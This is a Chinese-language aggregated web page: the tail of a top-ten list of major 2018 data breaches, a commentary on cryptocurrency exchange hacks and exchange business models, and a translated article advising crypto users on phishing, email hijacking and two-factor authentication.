今年2月,一名匿名攻击者截获了由Sacramento Bee拥有并运营的两个数据库。其中一个IT资产包含加利福尼亚州州务卿提供的加州选民登记数据,而另一个则存储了用户为订阅该报刊而提供的联系信息。在截获了这些资源之后,攻击者要求支付赎金以换取重新获得对数据的访问权限。Sacramento Bee最终拒绝了这一要求,并删除了数据库,以防止在将来这些数据库在被利用来进行其他更多的攻击。

根据Sacramento Bee的说法,这起黑客攻击事件共暴露了5.3万名订阅者的联系信息以及1940万加州选民的个人数据。

7)Ticketfly

2018上半年规模最大的十起数据泄露事件

  • 泄露数据超过2700万条
  • 披露日期:2018年6月7日

5月31日,Ticketfly遭遇了一次攻击,导致音乐会和体育赛事票务网站遭到破坏,并离线和中断一周。据报道,此次攻击事件背后的黑客先是警告Ticketfly存在一个漏洞,并要求其支付赎金。当遭到该公司的拒绝后,黑客劫持了Ticketfly网站,替换了它的主页,用一个包含2700万个Ticketfly账户相关信息(如姓名、家庭住址、电子邮箱地址和电话号码等,涉及员工和用户)的页面。

6)Panera

2018上半年规模最大的十起数据泄露事件

  • 泄露数据3700万条
  • 披露日期:2018年4月2日

4月2日,安全研究员Dylan Houlihan联系了调查信息安全记者Brian Krebs,向他讲述了他在2017年8月向Panera Bread报告的一个漏洞。该漏洞导致Panerabread.com以明文泄露客户记录,这些数据可以通过自动化工具进行抓取和索引。Houlihan试图向Panera Bread报告这个漏洞,但他告诉Krebs,他的报告被驳回了。在此后的八个月里,Houlihan每个月都会检查一次这个漏洞,直到最终向Krebs披露。随后,Krebs在他的博客上公布了这些细节。在Krebs 的报告发布后,Panera Bread暂时关闭了起网站。

尽管该公司最初试图淡化此次数据泄露事件的严重程度,并表示受到影响的客户不到1万人,但据信真实数字高达3700万。

5)Facebook

2018上半年规模最大的十起数据泄露事件

  • 泄露数据至少8700万条(尽管可能还有更多)
  • 披露日期:2018年3月17日

谁能忘记2018年3月令人震撼的Facebook数据泄露丑闻?当时,有报道称,一家名为Cambridge Analytica的数据分析公司通过一个应用程序收集了5000万Facebook用户的个人信息,该应用程序详细描述了用户的个性、社交网络以及在平台上的参与度。尽管Cambridge Analytica公司声称它只拥有3000万用户的信息,但经过Facebook的确认,最初的估计实际上很低。今年 4月,该公司通知了在其平台上的8700万名用户,他们的数据已经遭到泄露。

不幸的是,随着对Facebook应用程序更深入的审查,看起来Cambridge Analytica丑闻可能只是冰山一角。6月27日,安全研究员Inti De Ceukelaire透露了另一个名为Nametests.com的应用程序,它已经暴露了超过1.2亿用户的信息。

4) MyHeritage

2018上半年规模最大的十起数据泄露事件

  • 泄露数据超过9200万条
  • 披露日期:2018年6月4日

一名安全研究员于6月4日联系了在线家谱平台MyHeritage的首席信息安全官,并透露他们在公司外的私人服务器上找到了一个标有“myheritage”的文件。在检查文件后,MyHeritage的官员确认该资产包含了在2017年10月26日之前已注册MyHeritage的所有用户的电子邮箱地址。该公司发布的一份声明称,由于MyHeritage依赖第三方服务提供商来处理会员的付款,因此它也包含了他们的哈希密码,但不包含支付信息。由于该服务将家谱和DNA数据存储在与存储电子邮箱地址的服务器不同的服务器上,因此MyHeritage表示没有理由相信这些信息已经被暴露或受到损坏。

3)Under Armour

2018上半年规模最大的十起数据泄露事件

  • 泄露数据5亿条
  • 披露日期:2018年5月25日

3月25日,Under Armour获悉有人未经授权访问了MyFitnessPal平台,这是一个用于跟踪用户饮食和锻炼情况的平台。美国全国广播公司财经频道(CNBC)在当时报道说,负责此次黑客入侵的犯罪分子访问了用户的用户名、电子邮件地址和哈希密码。但没有暴露用户的付款信息,因为Under Armour对这些数据进行了分别处理。同时,它也没有损害社会安全号码或驾驶执照号码,因为服装制造商表示它并不会收集此类数据。

据信,超过1.5亿MyFitnessPal用户的信息在数据泄露中受到了损害。

2)Exactis

2018上半年规模最大的十起数据泄露事件

  • 泄露数据超过4亿条
  • 披露日期:2018年6月26日

安全研究员Vinny Troia在2018年6月发现,总部位于佛罗里达州的市场营销和数据聚合公司Exactis已将一个数据库暴露在可公开访问的服务器上。该数据库包含2TB的信息,其中包括数亿美国人和企业的详细信息。在撰写本文时,Exactis尚未确认受此事件影响的确切人数,但Troia表示他能够找到近3.4亿条个人记录。他还向Wired证实,此事件暴露了消费者的电子邮箱地址、实际地址、电话号码以及一系列的其他个人信息,在某些情况下包括极其敏感的细节,如孩子的姓名和性别。

1)Aadhaar

2018上半年规模最大的十起数据泄露事件

  • 泄露数据11亿条
  • 披露日期:2018年1月3日

今年1月份,论坛报业集团(Tribune News Service)的记者为WhatsApp上匿名卖家提供的一项出售登录凭证的服务支付了500卢比。通过这项服务,记者可以输入任何一个Aadhaar号码(一个12位的唯一标识符,每个印度公民会使用到它)检索印度唯一身份识别管理局(UIDAI)存储的关于被查询公民的诸多类型的信息。这些数据包括姓名、住址、照片、电话号码和电子邮箱地址。在向卖家额外支付300卢比的费用后,任何人都可以通过该软件打印某个Aadhaar号码归属者的身份证。

据信,这起数据泄露事件已经损害了在印度注册的11亿公民的个人信息。

其他值得注意的数据泄露事件

Strava

2017年11月,健身追踪应用程序Strava有意发布了一份包含1300万用户活动轨迹的“热图”。这张地图让我们了解了世界各地的人们是如何利用Strava来实现他们的健身目标的。但正如Bleeping Computer在1月底报道的那样,它也起到了意想不到的作用。联合冲突分析研究所(Institute for United Conflict analyst)的分析师Nathan Ruser于2018年1月发现,该地图显示了军事基地的位置。这是通过在已知军事设施所在的偏远地区展示人们的身体活动来发现的,其中包括美军基地以及土耳其和俄罗斯基地。

Health South East RHF

今年年初,挪威卫生安全部门HelseCERT检测到了异常的计算机活动。它最终将这种可疑行为追溯到了作为挪威四大区域医疗保健组织之一的Health South East RHF。根据Security Affairs的报道,HelseCERT发现这起攻击是由一群“专业的”和“高端的”攻击者发起的。

在HelseCERT披露此事件后,挪威卫生与护理部澄清说,该国采取了各种安全措施来解决这一问题。

受攻击影响的人数确切人数尚不清楚。但考虑到Health South East RHF的覆盖范围,可能有290万人(超过挪威总人口的一半)成为了事件的受害者。

[24]7.ai

4月4日,西尔斯控股公司(Sears Holding Corporation)和达美航空公司(Delta Airlines)都公布了属于数十万客户数据遭泄露的消息。这些数据是通过[24]7.ai的数据泄露而暴露出来的,这是一种提供在线聊天支持的第三方服务。

根据达美航空的声明,这起黑客入侵事件被认为发生在2017年9月26日至2017年10月12日期间,可能泄露了信用卡信息,但受影响的客户数量不详。该航空公司强调,没有其他信息(如护照、身份证或SkyMiles信息)受到影响。西尔斯估计,可能有少于10万名客户的信用卡信息在此次黑客入侵中被曝光。 一天后,零售商百思买(Best Buy)宣布,其一小部分客户可能也受到了此次事件的影响。

Orbitz

3月1日,Orbitz  发现 有人未经授权访问了它的一个遗留的旅行预订平台。这家在线旅行社认为,攻击者有能力查看某些敏感信息,包括客户姓名、出生日期、电话号码、电子邮箱地址、帐单地址、性别和支付卡信息。但没有证据表明这一事件暴露了客户的护照、旅行路线或社会安全号码。

根据彭博(Bloomberg)报道,黑客可能在2017年10月1日至2017年12月22日期间访问了88万名客户的支付卡详细信息。

令人不安的上半年

根据身份盗窃资源中心(ITRC)的2017年数据泄露总结报告,在2018年第一季度和第二季度遭泄露数据的数量已经超过了2017年全年遭泄露数据数量的总和。值得注意的是,本文所提供的数据泄露事件列表远远谈不上全面。在2018年上半年发生了许多其他的数据泄露事件,这意味着遭泄露数据的数量实际上要多得多。不过,也只有时间才能够证明这是否属实。

 

本文由 黑客视界 综合网络整理,图片源自网络;转载请注明“转自黑客视界”,并附上链接。

一场逐利的变革:蜂拥而来的交易所,到底是馅饼还是陷阱?

7月3日,李笑来的录音被曝光。整段录音中,李笑来心直口快地频爆惊人语句,也爆出了币安一些不为人知的内幕,李笑来直言币安CEO赵长鹏根本不懂技术,每逢行情技术就崩溃。没想到李笑来话音刚落,币安就出事了。

7月4日凌晨五时许,币安交易所出现超大额提现,2小时内,超过7000枚比特币转入同一地址,币安创始人何一对此表示,这只是一个看上去比较异常的正常转账,并非网传被盗。然而,同日上午八时,币安暂停交易与提现,进行临时维护。

一场逐利的变革:蜂拥而来的交易所,到底是馅饼还是陷阱?

在股市,人们依赖并信任证券交易所,资金安全有人把关,投资者要做的就是一心选好股票。但在币圈,大多数交易所并不是一个好的看门人,总有虎视眈眈的黑客和嗜血的商人伺机而动:

—2018.7.4 数字货币交易所火币提供的场外OTC平台存在安全漏洞并命名为“tradeRifle”,攻击者可利用此漏洞介入数字货币交易流程,窃取平台用户的数字资产。

—2018.6.20 韩国最大比特币交易所Bithumb遭黑客入侵,约350亿韩元(约合3200万美元,2亿人民币)资产被盗。

—2018.6.11 韩国比特币交易所Coinrail被黑客窃取了超过4000万美元。

—2018.3.30 晚间,OKEx的比特币和以太坊季度合约价格大幅偏离当前指数,期货现货差价最高逼近30%个点。据网传的OKEx爆仓记录统计,共有46万个比特币的多头期货合约和部分空头被爆仓。

—2018年1月 日本交易所CoinkCheck被盗约30亿元日元的新经币。

—2017年6月底 Bithumb被盗,当时用户损失资金达到了数十亿韩元。除了数字货币之外,黑客还成功获取了Bithumb 近31800名用户的个人信息,包括他们的姓名、手机号码以及邮件地址等……

尽管中心化的交易所接二连三地发生安全事故,但是依然有人蜂拥而至。据统计,近两年爆发的交易所大大小小有4000多家。

那么数字资产交易所盈利点到底在哪里,为什么许多投资者都想踏入其中呢?

1.手续费。这个是一个基本的盈利点,平台为交易双方提供担保场所,都会收取一定的手续费,基本上也就在千分之一—千分之五左右,具体按照每个平台实际情况去定。

2.上币费用。当平台发展一定阶段之后,交易量的增多也可以为平台带来一些新的资源,像币安、火币等等这些国际上的大平台收取手续费都是在几千万左右,低得也有几十万几百万。

当然需要结合的投资交易所的模式去评判,现阶段数字资产交易所的模式也很多,币币交易,OTC交易,C2C交易等还有现在的平台分红币模式。

但是即便是看起来很美好的去中心交易所也有“发展不起来”的弊端:

第一,流动性差

“流量”是决定一个交易所生死存亡的重要因素。没有流量,订单难以撮合,有些去中心化交易所上的订单要等上几十分钟甚至几天才能完成。

第二,用户体验差

初步估计,目前去中心化的交易所不到200家,几乎所有的去中心化交易所的用户体验都没有主流的交易所好,需要用户自学平台的使用方法,由于技术的复杂性也导致平台“很难用”。

第三,容易成为不法分子的天堂

去中心化交易所没有严格的上币审核机制、不受法律监管,使得去中心化的交易所成为很多小币种甚至是垃圾币的“收容所”。事实也是如此,观察得知很多小交易所上交易额最大的币种不是以太坊或者比特币,反而是一些没听说过的小币种。

所以,总的来说,无论是中心化还是去中心化的交易所无法同时满足安全、成本、用户体验这三点。对于资产安全问题,也是我国防范金融风险的重点领域。7.6日下午,有消息传出:

一场逐利的变革:蜂拥而来的交易所,到底是馅饼还是陷阱?

市场需要这么多交易所吗?其实并不需要。熊市了半年多,场内资金越来越少,参与用户也越来越少的情况下,交易所反而越开越多,真是奇怪的现象。交易所越来越多,意味着场内资金和用户会越来越分散,越分散越不利于拉盘,币价表现只会越来越差,熊市转牛市的时间会延缓。

安全,不仅是交易所的重要议题,也是国家金融监管的重点。正如李笑来录音中说的:“国家政策是我们的保护伞”。数字资产不同于有形资产,在保存方式上需要我们重新树立新的信息化安全防范意识。倘若最后真的是一地鸡毛,指望谁又来收拾这残局呢?

面对黑客种种手段,不要瑟瑟发抖!本文教你如何保护自己的加密资产

由于数字货币市场不断下跌,许多散户投资者开始对这个蓬勃发展的行业失去兴趣。尽管如此,加密货币业务仍在不断发展和扩展。这主要适用于专业的交易平台。虽然失败的投资者感到非常无助,但新的参与者依然在不断进入市场,包括高盛和纽约证券交易所的母公司洲际交易所(ICE)。

虽然一些拥有很少专业技能的投资者正在放弃这项业务,但这些知名企业才刚刚开辟出具有巨大潜力的新领域。但是,与此同时,网络犯罪分子很可能会更加瞄准这个行业。

安全分析师挑选出黑客或者其它不法分子用来攻击加密货币交易平台的几种主要技术和方法,并强调了每个用户都应遵循的应对措施。

面对黑客种种手段,不要瑟瑟发抖!本文教你如何保护自己的加密资产

网络钓鱼邮件

想象一下以下场景:你正在使用的加密货币交易所的安全系统声称在你的帐户中检测到可疑活动。为此,该系统向你的电子邮件地址发送通知。该邮件包含一个链接并建议你立即更改密码,以防资金被盗。

尽管这个计划非常简单,但实际上许多新手都会上钩并掉进陷阱中。如果你点开链接,通常需要填写几项内容:旧密码、新密码和确认新密码。这样,尽管交易者试图保持对加密货币的控制,却在不知不觉中将它们交给了骗子。

有几个简单的规则可以保证你的安全:

1.不要打开来自未知来源的电子邮件;

2.请勿将你的个人信息发送给第三方;

3.仔细检查发件人的电子邮件地址:来自交易所的邮件通常是从官方域名发出。

网络钓鱼网站

显然,所有加密货币交易者都是受过教育的人。但是,当在地址栏中正确输入交易所的名称或通过超链接访问其网站时,许多人都会忽略拼写错误,忽略了浏览器中丢失的安全验证图标

一旦这些不幸的交易者输入了他们的用户名和密码,犯罪分子几乎获得他们访问帐户所需的所有凭证。避免这种欺诈的唯一方法是密切关注细节,交易平台的网络钓鱼平台不太可能在不久的将来消失。

安全措施有以下:

1.为你经常访问的交易网站添加书签,只需点击此书签即可访问该网站;

2.始终使用具有加密保护功能的VPN

电子邮件劫持

与账户本身一样,链接到加密交易所帐户中的电子邮件也经常被黑客劫持。控制了你的电子邮件后,犯罪分子可以发送密码恢复请求,设置新的临时密码并轻松将加密货币转移到自己的钱包中。

在这种情况下,双因素身份验证(2FA)是最有效的保护机制,可防止第三方访问你的帐户。

TeamViewer作为切入点

遗憾的是,如果Google身份验证器是嵌入在PC上Web浏览器的,即使是双因素身份验证也无法确保完全的安全。安装TeamViewer工具后,攻击者可能会实时访问TOTP身份验证代码,并利用它们侵入并获取你在留在交易所中的个人信息。

只要应用程序安装在其他设备(如智能手机)上,2FA的保护作用就会一直有效。这大大降低了被劫持的风险。

许多加密货币交易所用户忽视了基本的安全措施,因为他们盲目相信自己永远不会像Mt. Gox和Coincheck的客户那样遇到麻烦。然而,即使是最精密最复杂的交易平台也有许多隐蔽的漏洞,不法分子可能会利用这些漏洞来攻击系统。

有些人可能会发现启用双因素身份验证是多余的,但你应该始终牢记黑客在智商上甚至可以胜过最成功的交易者。因此,必须遵循一些基本和简单的指导原则,这些指南将显著降低黑客攻击和诈骗之后丢失资产的风险。

发文时比特币价格 ¥44446.19

原文:https://www.ccn.com/the-common-tactics-used-to-hack-a-cryptocurrency-exchange/

作者:David Balaban

编译:Apatheticco

稿源(译):巴比特资讯(http://www.8btc.com/‎the-common-tactics-used-to-hack-a-cryptocurrency-exchange) 版权声明:

作者保留权利。文章为作者独立观点,不代表巴比特立场。